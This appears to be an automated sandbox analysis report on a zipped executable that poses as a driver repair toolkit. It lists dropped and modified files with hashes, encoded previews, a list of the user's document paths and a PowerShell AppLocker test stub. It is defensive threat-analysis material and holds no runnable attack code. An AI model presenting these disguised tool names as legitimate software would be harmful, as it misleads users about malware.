                    Preview:,UT,S,*SUS@X%XVSVT)*GT,@W,$VUV,%WPWUUVCQP$,PT$%PQSCPPX$WQ))VG%PT,VVTC,SC$VXWG@)@SX%CQ,$GTC)*X$VXC)S*$*XUUQC%,PU))CTCV,,XT**$Q,P***PQ*)SV,%TUQ)P,P%)G*SQUPQ%XPC%*UW,$W@WTWXQ,C@)QTVW,CV*QTVWC@XS@CSGW)Q@$G%GT,*XGXSX*%GUTP@@V%XVWG)WXUV@P))SS)VSCC)S*$*TQGVW@$SUP**TGUW,VW,W,,,TW**TXQVPQ%WUC@CTWSU)PTX%GV$)XVVWCSC))Q$G,QT$TW,VC*@Q%,SU%CC*,UX$*TUX*TW%)S,$*GQSX$$XTTUTS%VQG,VXVWP)G)T@%UT$WQ,)*SV@Q*)QPPTP%P%)G@%TGXTU*%GS),XVXC%,PT@))U$C%)%@$*XQC$$XP%$QU$*SV,)XWXTW*S@)QU$,)UV%*,GT%GW%VSVCPSG*GVUPS@X)G)CW@Q*PV%%X%%XQW$@X$S),*TCS)$,STP$..

                    C:\Users\Public\ypkiExpertDriverToolkit\AMDDefaultValueCPUxBLLcuvYobT.fzp

                    Download File
                    Process:C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):1784
                    Entropy (8bit):5.091408833762025
                    Encrypted:false
                    SSDEEP:
                    MD5:D771D7ADF766D04032B0914DB3061912
                    SHA1:4FB4F122EBC62F462C9FE11EF4673E82B5E894DC
                    SHA-256:44BF7C53C311C8993B395FCC006DAE30AF83579D70DA5F87665D6DF93B2818B6
                    SHA-512:A1E4CA1EFD1E6C75C4CFE3273294E323BFD40676A29D192B33AC01DE32C86D3E199D019C31CD1060E7ACCE0E50103F05FFC0B0B1549EA12EB738BBD7E3B3B178
                    Malicious:false
                    Reputation:low
                    Preview:C:\Users\user\Desktop\CZQKSDDMWR.docx..C:\Users\user\Desktop\CZQKSDDMWR.xlsx..C:\Users\user\Desktop\CZQKSDDMWR\CZQKSDDMWR.docx..C:\Users\user\Desktop\CZQKSDDMWR\LFOPODGVOH.xlsx..C:\Users\user\Desktop\GLTYDMDUST.docx..C:\Users\user\Desktop\GLTYDMDUST\GLTYDMDUST.docx..C:\Users\user\Desktop\GLTYDMDUST\HMPPSXQPQV.xlsx..C:\Users\user\Desktop\HMPPSXQPQV.xlsx..C:\Users\user\Desktop\LFOPODGVOH.xlsx..C:\Users\user\Desktop\NYMMPCEIMA.docx..C:\Users\user\Desktop\NYMMPCEIMA\NYMMPCEIMA.docx..C:\Users\user\Desktop\NYMMPCEIMA\ZIPXYXWIOY.xlsx..C:\Users\user\Desktop\ZIPXYXWIOY.docx..C:\Users\user\Desktop\ZIPXYXWIOY.xlsx..C:\Users\user\Desktop\ZIPXYXWIOY\CZQKSDDMWR.xlsx..C:\Users\user\Desktop\ZIPXYXWIOY\ZIPXYXWIOY.docx..C:\Users\user\Documents\CZQKSDDMWR.docx..C:\Users\user\Documents\CZQKSDDMWR.xlsx..C:\Users\user\Documents\CZQKSDDMWR\CZQKSDDMWR.docx..C:\Users\user\Documents\CZQKSDDMWR\LFOPODGVOH.xlsx..C:\Users\user\Documents\GLTYDMDUST.docx..C:\Users\user\Documents\GLTYDMDUST\GLTYDMDUST.docx..C:\Users\

                    C:\Users\Public\ypkiExpertDriverToolkit\lcxjsQevireQrgrpgZnfgregiQevireErcnveCeb.cfg

                    Download File
                    Process:C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):1246
                    Entropy (8bit):4.05678900203087
                    Encrypted:false
                    SSDEEP:
                    MD5:4F62959D88AA05670B0871F05FF4ED48
                    SHA1:B8D77927B15271E62F4642B226D675F09FE8D3B9
                    SHA-256:7B85E3B88AD44E38D19D17C846F5F4CD106CBCC61E067A76AFEC45DF96F93A03
                    SHA-512:F7F13879B5CC265E124B9565F2E555A4926D5D4987D289F7046E991FE94FB2903BF6BC45253608AB8184B0EC23FDB9F38C2AD8352ECAC2EE415D671FFCCC59E6
                    Malicious:false
                    Reputation:low
                    Preview:XQXXXXXXS)QG$S*#C@SW%S$UW*G@UT$U#)*$T@@$..XVXXXXXXQQ)WSC$$@QUSCV)$U%GU$$XQSW@CGCS)..TWXXXXXXCP*@*@P@GS$VVWV%#XGWP)GT#V$@T*VWGSVX@)@PTV$#)##ST*CGXU)V#*)X$UUW..G%XXXXXXV@C%WSQPQVV)TWUS@Q%S@UUQ#W%@UW%)@)VQSVQWQ)W%)S%XU*)XGX*X%PTVSPSGQ#G)@%%VV%X#$QT*UCSX#UC)GXVWUGPPPV#V**#*)%WW$*QS$)))@)G@G%X*S$*W..............TQXXXXXX@*T@@%U@XT$$T)U@QT@Q$CTS@*W#WP$T#CTCQU#)UP)CVU$XQCWC)*%)S%@PCSGX....XVXXXXXXV)#)CQXT@#WPT%XQTPSVV*W@Q@Q#SP#%..XVXXXXXXXG$XCX$CC@V%*)X*#CGVCXWPUPUGXT#U..XVXXXXXX)CSTX%CS##UXV$XGPGWWW**%X*%QC*$W..XVXXXXXX#$STT*VQGQT@GCCQ*PGGC)#Q*)*UQSXP..XVXXXXXXCQ@$Q)PG#@*SW$PV%Q*U%@T*#QXPVU#$..XVXXXXXX%#U@VT%*W$#UQ%*QU@*%T*)VP*#VQVP$..XVXXXXXXTT)QG*USSQ)%##US$#TGSV#UQ$T*%#X@..XVXXXXXXCPS#VQCWV%CQS@TVT)*@U@V@X%*VPPG$..................XVXXXXXX%#G@XXQ%)P%Q$CGS#S%#XG$PV$TXQP@@....T#XXXXXX$@XCGG@CT)%*U#)WVG%*S#SGUVSC#%U)G%CV$T%@G)%)SS#V)T)UQXQ*T$#%*)@$..TPXXXXXX*V)PUG)C%PG@*P$P)XPX*PU%%C%*QQ*V%PQS$TT*GWPU%%#@*XP@X@VW@%P##U%W....XVXXXXXXX@#)QT#)WGPU#@@@SGGP$GPTSW)XCPUT......XVXXXXXXVU#PTUPGUPG#$QV*

                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1240
                    Entropy (8bit):5.355696523427577
                    Encrypted:false
                    SSDEEP:
                    MD5:E37F3EA14346C7BB85516220224B56DA
                    SHA1:B2426C975D6DF2E16DBAFABD6EF39AD98B045F01
                    SHA-256:0CBCDFCA06D358346F22092F4AC1A6968FDA85A4F106E96D68F17670EABB582D
                    SHA-512:CF3A3C4EB81F6DD718968C90AA2425B40CC45B8C9523B0E292E8D727B014C887965EF2B76306E57D7E65A2CA44DE3C8B84331DBF17BC07E47A56CE34E7E097EB
                    Malicious:false
                    Reputation:low
                    Preview:@...e.................................@..............@..........P..................]...C....).........(.Microsoft.PowerShell.Commands.ManagementH..................#..A..g&.E$v...... .Microsoft.PowerShell.ConsoleHost0...............e.+.<..K..!..K.#........System..4................q.e...B..SP9?.........System.Core.D................0.9...K.r.*6...........System.Management.AutomationL...............TKZ....M..{.0.........#.Microsoft.Management.Infrastructure.<................/....KA..%*.}2.........System.Management...@...............l._>.CnI.ATB............System.DirectoryServices<.................w..WD... . ..........System.Configuration4...............-..%3..A.s.o.4+.........System.Xml..8.................`..ERC..B9%%.=........System.Numerics.4...............]v.P3..G..............System.Data.H..................!"EA.._>^...........Microsoft.PowerShell.Security...<...............d@..dhD...<.;4!........System.Transactions.D.................!....C...^............System.Configuration.Ins

                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xnvg42cr.u2b.ps1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Reputation:low
                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                    Static File Info

                    General

                    File type:Zip archive data, at least v2.0 to extract, compression method=deflate
                    Entropy (8bit):7.982000195676978
                    TrID:
                    • ZIP compressed archive (8000/1) 100.00%
                    File name:file.zip
                    File size:5'428'394 bytes
                    MD5:bfd4303cead7b992c6d8582bf00ebccd
                    SHA1:586a97c675f1abb8423dd05f731651add8d5a4e3
                    SHA256:26642f30dc75d56d3c7f3d5432b9906a320627e6681f387c72923a24f13484bb
                    SHA512:c242f354affdd2c220763b76c6944635730d0d2ecb5d8ad9124af48b6a6d8194da6cf2c747c6afe09fcb75dac7b3c46f9212bad6244d96d5e302aad8072ed918
                    SSDEEP:98304:1zDERdoDu5+IjtXvsqhsbQC8nEPSRlwrlyr2P+Ug7RZY+11XTo5MGdl3b:a326FfwrlQ2GrZTXkqclr
                    TLSH:ED4633D4F45C2120FF23A6355D82628ADCA88E71BC1615C2173FE506F863A731BF799A
                    File Content Preview:PK..........9W!..-..R.........file.exeUT......e...eux..............;ml[.u...IQ../'n......-.r.8N.....+..-Q....i..bE...c,w].f.....m.....8.flI..Fa4.....mj..Fa........f......s.=..=....=@:..{...=.}/F@.....|....'.........P..r.O........OG'.....>f....rY....l.R..T

                    File Icon

                    Icon Hash:1c1c1e4e4ececedc